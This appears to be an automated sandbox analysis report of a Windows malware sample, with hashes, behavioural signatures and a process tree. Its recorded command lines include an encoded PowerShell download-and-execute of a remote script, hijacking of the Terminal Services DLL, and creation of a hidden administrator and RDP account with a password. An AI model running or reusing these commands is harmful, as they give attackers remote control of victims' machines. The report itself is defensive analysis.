Analysis
- max time kernel: 131s
- max time network: 121s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 08-11-2020 17:46
Static task: static1
Behavioral task: behavioral1
  Sample: 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
  Resource: win10v20201028
General
- Target: 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
- Size: 3.5MB
- MD5: 7e806fd5ef516e10a4e4a5362fbc600b
- SHA1: edb1b43d7578f170f259958663ace80a01718dc8
- SHA256: 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b
- SHA512: 30544680de5f5af999cbbba6d632acb4319c370bf526b23cde5e8f40172b97d885608e5a9b086d1cd2df6ee97cc5bb51bb9bf74a742d5866dcca2c58b6c2dbd8
Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.
Blacklisted process makes network request (10 IoCs)
Processes:
  flow | pid  | process
  6    | 1524 | powershell.exe
  8    | 1524 | powershell.exe
  10   | 1524 | powershell.exe
  11   | 1524 | powershell.exe
  13   | 1524 | powershell.exe
  15   | 1524 | powershell.exe
  17   | 1524 | powershell.exe
  19   | 1524 | powershell.exe
  21   | 1524 | powershell.exe
  23   | 1524 | powershell.exe
Modifies RDP port number used by Windows (1 TTPs)
Possible privilege escalation attempt (8 IoCs)
Processes:
  pid  | process
  1592 | icacls.exe
  1168 | takeown.exe
  928  | icacls.exe
  820  | icacls.exe
  1892 | icacls.exe
  1780 | icacls.exe
  388  | icacls.exe
  1596 | icacls.exe
Sets DLL path for service in the registry (2 TTPs)
Processes:
  resource                        | yara_rule
  \Windows\Branding\mediasrv.png  | upx
  \Windows\Branding\mediasvc.png  | upx
Deletes itself (1 IoCs)
Processes:
  pid  | process
  1520 | powershell.exe
Loads dropped DLL (2 IoCs)
Processes:
  pid | process
  776 |
  776 |
Modifies file permissions (1 TTPs, 8 IoCs)
Processes:
  pid  | process
  820  | icacls.exe
  1892 | icacls.exe
  1780 | icacls.exe
  388  | icacls.exe
  1596 | icacls.exe
  1592 | icacls.exe
  1168 | takeown.exe
  928  | icacls.exe
Drops file in System32 directory (1 IoCs)
Processes:
  description  | ioc                             | process
  File created | C:\Windows\system32\rfxvmt.dll | powershell.exe
Modifies service (2 TTPs, 2 IoCs)
Processes:
  description     | ioc | process
  Key created     | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | reg.exe
Drops file in Windows directory (41 IoCs)
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b2fcaef4-fe23-4bce-824b-6f6358e02795 | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1392e70e-8760-49f9-8db6-9210f73c194f | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE7E2.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE812.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE99A.tmp | powershell.exe
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE9FE.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OC4OCEVQ0O8MTHG64QLV.temp | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6ca124d-2b16-44b3-b580-ffcbc351d963 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE762.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE7E1.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE99B.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE9AC.tmp | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f47bda0-737c-4ae9-85f7-27ae6ff58d6b | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f637b8f2-be9c-4cd3-9bb2-8473715f4eed | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE9AB.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE9FD.tmp | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarEA20.tmp | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_97d0585d-0c74-4d3a-b7b3-e44078483ccf | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d9e07f56-99aa-4761-adbb-7ee46037c24c | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4936f899-a790-4ea7-91ea-f8cbd194919f | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3add778d-4d46-412c-aff1-6168a6ec4152 | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE9DC.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE9DD.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabEA1F.tmp | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b790b175-d71f-400d-a665-dc041bfbf95a | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ba969b79-46fa-4f1b-9437-043abed65c8d | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE763.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE813.tmp | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
Modifies data under HKEY_USERS (60 IoCs)
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70a9bef30bb6d601 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | powershell.exe
Modifies registry key (1 TTPs, 1 IoCs)
Runs net.exe
Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes:
  description            | flow | ioc
  HTTP User-Agent header | 10   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 11   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 13   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 15   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes:
  pid  | process
  1520 | powershell.exe
  1520 | powershell.exe
  1520 | powershell.exe
  1520 | powershell.exe
  1520 | powershell.exe
  1524 | powershell.exe
  1524 | powershell.exe
Suspicious behavior: LoadsDriver (5 IoCs)
Processes:
  pid | process
  464 |
  776 |
  776 |
  776 |
  776 |
Suspicious use of AdjustPrivilegeToken (15 IoCs)
Processes:
  description                          | pid  | process
  Token: SeDebugPrivilege              | 1520 | powershell.exe
  Token: SeRestorePrivilege            | 820  | icacls.exe
  Token: SeAssignPrimaryTokenPrivilege | 304  | WMIC.exe
  Token: SeIncreaseQuotaPrivilege      | 304  | WMIC.exe
  Token: SeAuditPrivilege              | 304  | WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege | 304  | WMIC.exe
  Token: SeIncreaseQuotaPrivilege      | 304  | WMIC.exe
  Token: SeAuditPrivilege              | 304  | WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege | 1780 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege      | 1780 | WMIC.exe
  Token: SeAuditPrivilege              | 1780 | WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege | 1780 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege      | 1780 | WMIC.exe
  Token: SeAuditPrivilege              | 1780 | WMIC.exe
  Token: SeDebugPrivilege              | 1524 | powershell.exe
Suspicious use of WriteProcessMemory (133 IoCs)
Processes (identical consecutive rows collapsed, count in the last column):
  description                     | pid  | process | target process | count
  PID 1640 wrote to memory of 1520 | 1640 | 5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe | powershell.exe | 4
  PID 1520 wrote to memory of 1688 | 1520 | powershell.exe | csc.exe | 3
  PID 1688 wrote to memory of 1084 | 1688 | csc.exe | cvtres.exe | 3
  PID 1520 wrote to memory of 1168 | 1520 | powershell.exe | takeown.exe | 3
  PID 1520 wrote to memory of 928  | 1520 | powershell.exe | icacls.exe | 3
  PID 1520 wrote to memory of 820  | 1520 | powershell.exe | icacls.exe | 3
  PID 1520 wrote to memory of 1892 | 1520 | powershell.exe | icacls.exe | 3
  PID 1520 wrote to memory of 1780 | 1520 | powershell.exe | icacls.exe | 3
  PID 1520 wrote to memory of 388  | 1520 | powershell.exe | icacls.exe | 3
  PID 1520 wrote to memory of 1596 | 1520 | powershell.exe | icacls.exe | 3
  PID 1520 wrote to memory of 1592 | 1520 | powershell.exe | icacls.exe | 3
  PID 1520 wrote to memory of 1684 | 1520 | powershell.exe | reg.exe | 3
  PID 1520 wrote to memory of 1752 | 1520 | powershell.exe | reg.exe | 3
  PID 1520 wrote to memory of 1268 | 1520 | powershell.exe | reg.exe | 3
  PID 1520 wrote to memory of 1612 | 1520 | powershell.exe | net.exe | 3
  PID 1612 wrote to memory of 2008 | 1612 | net.exe | net1.exe | 3
  PID 1520 wrote to memory of 1648 | 1520 | powershell.exe | cmd.exe | 3
  PID 1648 wrote to memory of 1100 | 1648 | cmd.exe | cmd.exe | 3
  PID 1100 wrote to memory of 1084 | 1100 | cmd.exe | net.exe | 3
  PID 1084 wrote to memory of 1092 | 1084 | net.exe | net1.exe | 3
  PID 1520 wrote to memory of 332  | 1520 | powershell.exe | cmd.exe | 3
Processes
(bracketed number = depth of the process in the tree; "cmdline:" is the recorded command line)

[1] C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe"
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      - Deletes itself
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6420.tmp" "c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\CSCECA57343D3A14B89AA49B14023A79037.TMP"
    [3] C:\Windows\system32\takeown.exe
        cmdline: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies service
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start TermService
        [5] C:\Windows\system32\net.exe
            cmdline: net start TermService
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc Ghar4f5 /del
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc Ghar4f5 /del
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc wlgHGI30 /add
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc wlgHGI30 /add
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc wlgHGI30 /add

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc wlgHGI30
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc wlgHGI30
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc wlgHGI30

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic CPU get NAME
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
